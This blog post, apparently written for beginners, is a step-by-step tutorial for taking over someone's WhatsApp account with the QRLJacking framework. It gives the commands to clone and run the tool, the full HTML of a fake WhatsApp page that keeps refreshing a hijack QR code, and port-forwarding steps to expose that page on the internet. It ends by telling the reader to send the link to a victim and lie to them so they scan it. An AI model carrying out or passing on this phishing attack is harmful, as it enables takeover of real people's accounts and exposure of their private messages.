Watch the Tutorial on Youtube👉 https://youtu.be/oopfTINPXdI
Let's start by opening a new terminal
and type in git clone https://github.com/OWASP/QRLJacking.git
side note:There's two ways to use this, either manually or automatically by using the QrlJacker
For the sake of keeping this tutorial short, and for it to be beginner friendly, I'll demonstrate how to do this with the QrlJacker.
now we need to enter the directory that contains the frame work, to check if we have all of the requirements
to do that we will use CD
type in your terminal cd QRLJacking/QrlJacking-Framework
if you're using kali linux, usually the requirements are already met, but as a matter of caution we'll run the requirements installation script anyway.
to do that type in pip install -r requirements.txt
Now that that is done, we're ready to start
To use the QrlJacker type in the following:
python QRLJacker.py
As you can see, many options are available, but for our tutorial we're only interested in whatsapp
type in 1 and click enter
then type in 1 another time
you'll be asked to choose a port, leave it empty if you would like to use the default port(1337)
A new window of mozilla firefox will be opened and the server will be started at yourIpAdress:portYouChose
for me it's 192.168.1.103:1337
As you can see, The qr code is displayed on this local website that we will send to the victim
but who would scan that? Too suspicious
Let's edit it.
go to QRLJacking/QrlJacking-Framework/
right click on index.html
open with other application, choose a text editor
then edit it to be like this code
<!DOCTYPE html>
<html>
<head>
<title>Whatsapp</title>
</head>
<body>
<script>
var myTimer; myTimer = window.setInterval(reloadD,3000);
function reloadD(){ d = new Date(); document.getElementById('qrcodew').src="tmp.png?h="+d.getTime();}
</script>
<center>
<img id="qrcodew" alt="Scan me!" src="tmp.png" style="display: block;">
<a href="#">Scan the code with whatsapp</a>
</center>
</body>
<style>
body {
background-color:#000;
}
#qrcodew {
background-color: white;
padding-right: 35%;
margin-top: 10%;
padding-top: 4%;
padding-bottom: 4%;
padding-left: 35%;
}
a {
text-decoration: none;
}
</style>
</html>
Kept that code as simple as possible, that way even beginners have a chance in understanding and editing the code to their liking
this is script kiddie level code
To be able to do this attack easily over wan, go to your router configuration page and forward the port 1337 on your private ip
(in my case it's 192.168.1.103)
then
the link will be yourPublicIpAdress:portYouForwarded
example: 93.176.88.82:1337
send that link to the victim if he's outside of your network
and he'll be able to access our fake website
create a lie to make them scan the code
and you'll be able to access their whatsapp
Comments
Post a Comment